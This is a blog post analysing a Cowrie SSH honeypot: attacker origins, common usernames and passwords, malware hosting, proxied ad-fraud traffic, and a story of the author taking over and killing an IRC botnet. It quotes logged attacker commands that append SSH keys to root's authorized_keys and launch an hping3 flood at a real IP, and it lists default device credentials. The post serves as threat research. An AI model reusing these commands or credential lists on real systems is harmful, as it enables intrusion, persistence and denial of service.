Funny Honey – tracking hackers in cyberspace part 2

SSH

Now lets continue with probably the most interesting service.

First question – Who connected to our SSH?

ssh_1

Here is top 10. Overall we got connections from 85 countries.
Interesting that US and China are so close.
Now to ASN data:

ssh_2

Here is top 10. Overall we got connections from 578 ASNs.
I thought the AS18403 was interesting, but looks like this is actually a some kind of Vietnam telecom provider and ASN data in database is incorrect.

I setup this honeypot in such a way, that you can connect to it with any user name and password, but only with the first combination you try, other subsequent attempts will fail. It is done so it doesn’t look weird that your honeypot have any valid user name attacker tries.
Next question – What is most common successful login usernames?

ssh_3

Here is top 10. Overall we got 187 unique user names.
I guess it’s not really surprising, but you could clearly see that there is a lot of attacks against IoT devices such as home routers. I don’t think there is much point in bruteforcing root nowadays, since its usually disallowed by default on many systems. There is a couple of other interesting ones:

  • admin – this username commonly used on home routers
  • ubnt – is the default user name used on Ubiquity Networks routers
  • pi – is the default user name on Rasberry Pi Raspbian distribution
  • vagrant – is the default user name for Vagrant system used by developers to create automated VMs
  • curis – this one is curious, I haven’t found what is this, but there is a US biotech company with the same name that make cancer treatment drugs. Could be some kind of medical device?
  • support – can be anything, haven’t found something conclusive.

Let’s see if there is any other interesting usernames.

  • Fortimanager_Access – this is for recently found SSH backdoor in Fortinet devices
  • abangela – this is one of my fake FBI employees who got an account on the system, interesting.
  • nmis – this is for Opmantek NMIS Network Management System
  • PlcmSpIp – this is for Polycom SIP Phones
  • mapred – this is for Cloudera Hadoop distro
  • dspace – possibly for duraspace dspace, some kind of repository software
  • boomi – possibly for Dell Boomi cloud services
  • openproject – this is for Open Project open source project management software
  • mittel_math – don’t know what is this, but it translates from german as medium math

There is also other stuff like team speak, jboss, DB2, oracle e-business suite, mythtv, minecraft, jira, redmine, cpanel svn and git.
Next question – What is most common failed login usernames?

ssh_4

Here is top 10. Overall there is 5768 unique usernames.
There is also a different stats here, seems to be developer services like source code management and build servers targeted more.
There is not much interesting stuff in other names, more various DBs like informix, mongodb and couchdb, lots of names, lots of generic words and some junk too.
Another cool thing to do is to compare this list to some common user list and see how many of those match, but unlike password lists, I don’t know any good user name lists to do this. If you know a good and commonly used lists, please leave a comment.
Instead, I have a couple of users in my /etc/passwd and also a file, which is used like user database, which is in fact real life FBI leak of usernames and password, snip of which you saw in the first part. Unfortunately, there is no logon attempts under any of those users except for abangela.

Next question – What is most common successful password?

ssh_5

Here is top10. Overall there is 323 unique passwords.

There is nothing interesting in passwords themselves, so let’s see how many of those can we find in common password wordlists.
I will be checking passwords against 10k_common_list, rockyou and ashley madison lists.

ssh_6

So, looks like about 20% of our passwords can be found in 10k common, about 22% in ashley madison list and about 32% for rockyou. That’s interesting, it appears attackers don’t use very common wordlists. Manual checking also confirm this as I got passwords like frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ which is either shitty password list or they may onto something…
Googling for this password doesn’t reveal much – some hits where this value was used as salt and this value used as ps4passcode in Unity video game projects, don’t know what this means.
Password !@ is also interesting, I saw this hardcoded into some monitoring scripts on github, but wasn’t able to find more.

Next question – What is the most common failed password?

ssh_7

Here is top10. Overall we got 22828 unique passwords attempted.
No real surprises with top passwords, but I thought unique number of passwords will be way higher, like a hundred thousand range maybe.
Cursory glance over this dataset doesn’t reveal much other than the fact there is a lot of junk in it, including very random ones, like you would get out of password manager. Googling some of those random password reveal only other sources that confirm SSH bruteforce activity with those passwords like SANS Dshield and nothing more. I think it’s just some shitty password list that those bots reuse. Don’t tell me you believe someone would use 42:be:18:14:e5:75:24:bc:ed:70:f3:fa:9f:de:6a:7e. or 5faWed2ff8aA116e3X1faZ0I0f719Qf40obe as a regular password. I mean, I use passwords like this all the time, but there is no point bruteforcing randomly generated passwords.
Now let’s do the same wordlist analysis.

ssh_8

So, most of our failed passwords is unique and there is less than 1% that is found in public wordlists. Well, considering it contains mostly useless junk passwords it’s not a real surprise.
Next question – Is anyone accessed “classified” data?
Of course! Although most of the attacks is automated, so they going to miss our files, there was couple of guys who accessed and tried to copy our secret files. I thought there would be more of them honestly.

hacker

He also tried to copy files, but it seems he is not a very skilled linux user:
scp -r -f /fbi
scp -r -f /fbi
scp -f /fbi/*
rsync –server –sender -logDtprze.iLsf . /fbi

Let’s see where those guys from?
188.24.201.117|AS8708 RCS & RDS SA|Romania
188.24.227.146|AS8708 RCS & RDS SA|Romania
209.126.247.39|AS10439 CariNet, Inc.|United States
2.229.43.84|AS12874 Fastweb SpA|Italy

Two of those is consumer ISPs, so there is a possibility they connected directly from their home PC. Other guys looked at some files and immediately disconnected, got scared of FBI? 🙂
Next question – Is there are anything interesting in commands?
Well, not really. Most of the commands related to downloading and manipulating malware. There was a couple more interesting ones:
Looks like some guy got confused why his perl script wasn’t running and accidentally copied valgrind example from stackoverflow question regarding segfaults in perl scripts:
valgrind perl ./yourfaultyscript.pl
Another one added his ssh keys:

echo “ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIB8NTwrTVNx8KZwzNj067GiIfz8Vc2DgqvmEatkwH1hjiM/jdrq2VFEAJI75AIdarHo1jVL7ZcpsmiIJQ3Pi+P0JdAXARK8PJEZyRQJLJusucbJeU9FI4drnPceKKthaSjVl/9bWa6ckmrYaFIfnNZtAH9CAWn6TCGb5lDfKdgC5Q== awsnext”  >  >  authorized_keys
echo “ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEA3nB0UKB+AEFq9UJIkPcfxKiStiPCzB8n1Z/jx3zjlJaiKZAHetGJuT9W9wtGjNYPQ7D5qNvCKO9u+Mpv5VFyaAyRZUkP2SrJ/120QbFr+loUItvptGi3LlFlYravutXMsst2+w+oiqWhJYEqmwCl5JO2m56avQQMaevnKwexH4EobCIWNxVzGL54zXGOtf/0pK+IEL7fRy/WAQmjT23XJTJr7OGx09rdhzxRMxyk7a0XK5MW3MOY9SLqn7iDe2mQ0yDZcsM5CtuggB0r2AtapifPWFtoRYBjUrFNL1P5nOhc4jHEtlFtlVpIchO2aOJLRg1nYT/ndGb9bC23/ubpSQ== root@libre”  >  >  /root/.ssh/authorized_keys

That key used on some romanian site in script file.
Yet another one installed hping and lauch a ping flood against some host in Romania:
hping3 -1 –flood 89.136.79.211

Next question – Where malware is hosted?
Since most of the commands is malware related, let’s see where this malware is hosted. Overall we got 121 malware URLs.

ssh_9

And for ASN:

ssh_10

Here is top10. Overall we got 52 ASNs, mostly hosting providers.

Other insights from this data:

  • Most of URLs use HTTP and direct IP address connection, instead of domain name. Very few use FTP and HTTPS.
  • Most of them also use non-standard ports, instead of regular port 80
  • As for domains used, here is breakdown of TLD zones. They also like to abuse free .tk domains.

ssh_11

Next question – What type of files was downloaded?

ssh_12

Here is top 10. Overall we got 23646 files downloaded. Not all of them was downloaded via http since cowrie also implement sftp, that’s why there is a discrepancy with URL analysis, plus there was also a lot of duplicates.
Looking over some of those files I’ve got lots of scripts that download the same malware, same for malware binaries itself, a little bit of lame perl dos scripts, a little bit of password lists and IP lists for DoS bots, but overall  – nothing very interesting.
Next question – what type of malware was downloaded?

ssh_13

Here is top 10 results by Kaspersky. Overall we got 43 unique verdicts.
Obviously not everything is detected and not every file is a malware.
Here is top 10 for Avast.

ssh_14

This is a commodity Linux malware, usually various IRC based botnets, that you can read about just about every day on http://blog.malwaremustdie.org/
Most of those used to perform DDoS and ssh bruteforce attacks.

Botnet story

Some time ago I’ve looked into one of those botnets, called “BadLuckJosh” that is still spreading today.
It is spreading by doing ssh bruteforce, uploading some binaries or perl script, than infected bots doing the same.
Here is example of this botnet. Stage 1, downloader shell script:

ssh_15

So, once I’ve got a perl script, that was also used as part of this botnet. It also had a really simple authentication – bot joined the IRC channel on some IRC server and looked for certain names of users, designated as admins. To those users it would immediately grant a shell access.
Here is part of this script:

ssh_16

So I joined under one of those names and got control of about 200 bots, mostly routers and rasberrypi devices.
Here is example of commands, that bots accept:

ssh_17

It can launch DoS attacks, do port scans, do sql injections and other stuff.
Here is example of shell access via IRC:

ssh_18

Also note this is a fat server, not a router.
I’ve also collected partial hostnames from IRC log, but full hostnames aren’t visible and I was able to collect it only for 50 hosts. But it’s enough to do some analysis.
Let’s see what domain zones our bots presents:

ssh_19

Here is top 10 TLDs for bots. Overall we got 13 unique TLDs.
Most of those devices is all over the world and their hostnames mapped to some generic ISP reverse DNS names.
Let’s try to get ISP for those bots:

ssh_20

Here is top10. Overall we got 31 unique ISPs.

Bots also had a command to destroy itself. Since it also didn’t have a persistence, I’ve quickly thrown a script together to kill all bots.

ssh_21

Here is bots started to die off:

ssh_22

It’s done.

ssh_23

Two of their C2 was hosted on OVH, so I reported it to their abuse, but never heard back. Which is not really surprising, OVH is notoriously botnet friendly and ignore abuses. So I’ve also reported them to French CERT, which also didn’t really help, as this is what I’ve got in response:

ssh_24

What’s the point of having a national CERT without any authority? From my experience even some commercial CERTs can react fast due to some arrangements with domain registers and ISPs.
I’ve could get out of my way and report this to some private contacts and get this cleaned, but what’s the point? Unfortunately, since they bruteforce default credentials, they rebuilt botnet in a day. I’ve had a temptation to change passwords myself, but this probably would be too disruptive to users, so I didn’t.

Next question – What SSH client version was used?

ssh_25

Here is top10. Overall we got 83 unique client versions.
Libssh is commonly used by bruteforcing bots, other than that, there is some other libraries for languages like Python, Erlang, C# and tools like Medusa and nmap.

Cowrie also has an interesting feature, emulating SSH proxy and forward connections elsewhere.
Next question – Where connections was forwarded?

ssh_26

Here is top10. Overall we got 103 countries.
And for ASN data:

ssh_27

Here is top10. Overall we got 1256 ASNs.

Next question – what type of services was proxied?

ssh_28

Here is breakdown. Most of it web and email related, presumably for sending spam and using this server as a proxy for browsing web. There is a couple of non standard ports as well.
Next question – What hosts was accessed the most?

ssh_29

Here is top 10 hosts. Overall we got 6156 hosts accessed.
Next question – Is there anything interesting in payload?
The cool feature is that cowrie also logs payload for this forwarding requests.
Nothing interesting in other data, so let’s focus on HTTP data. There are all kind of requests, all 323739 unique of them.
However, a lot of them seems advertising related, that looks like this:

‘GET /analytics.js HTTP/1.1\r\nHost: http://www.google-analytics.com\r\nConnection: keep-alive\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36\r\nReferer: http://www.3fatchicks.com/forum/alternachicks/168984-help-eyebrow-piercing.html\r\nAccept-Encoding: gzip,deflate\r\nAccept-Language: en-us,en;q=0.8\r\n\r\n
‘GET /2.0/733/adtag.js HTTP/1.1\r\nHost: tags.tagcade.com\r\nConnection: keep-alive\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36\r\nReferer: http://www.funimation.com/shows/haganai\r\nAccept-Encoding: gzip,deflate\r\nAccept-Language: en-us,en;q=0.8\r\n\r\n’
‘GET /a/h/vZX9NUPEHHiF12jWeI6Y44NEDuSEpViIcDt29RP7ti1l7M4y+Qq0lTxfMrOaJxQvevQUiH2eRZA=?cb=644696702249348200&pageUrl=http%3A%2F%2Fwww.wwmt.com%2Ftemplate%2Finews_wire%2Fwires.national%2F33651c67-www.wwmt.com.shtml&description={DESCRIPTION}&duration=120&id=__random-number__&keywords={KEYWORDS}&title={TITLE}&url=VIDEO_URL&eov=eov HTTP/1.1\r\nHost: ads.adaptv.advertising.com\r\nConnection: keep-alive\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36\r\nOrigin: http://www.wwmt.com\r\nAccept: */*\r\nReferer: http://www.wwmt.com/template/inews_wire/wires.national/33651c67-www.wwmt.com.shtml\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.8\r\n\r\n’

Not sure what is this, could be some kind of ad fraud?
Here is top10 sites based on Host header:

ssh_30

As you can see, most of those related to advertisement.

Here is top 10 user-agents:

ssh_31

Nothing interesting here.

Here is top 10 sites in Referer:

ssh_32

They seem to fake Referer to various legitimate sites, so traffic would look real. This also confirm some kind of ad fraud scheme. Nothing interesting other than that.

Advertisements

3 comments

  1. Really Interesting series. Thanks for posting. I’d be interested to see a post with some more details about the Honeypot itself if possible.

    Like

  2. the type of services proxied is interesting. ive been running my own honeypots for the last couple of months and have seen a large amount of port 25 proxying. Installation of mailoney and using cowrie to forward the connections to it shows that they are trying to send blank emails which is quite strange.

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: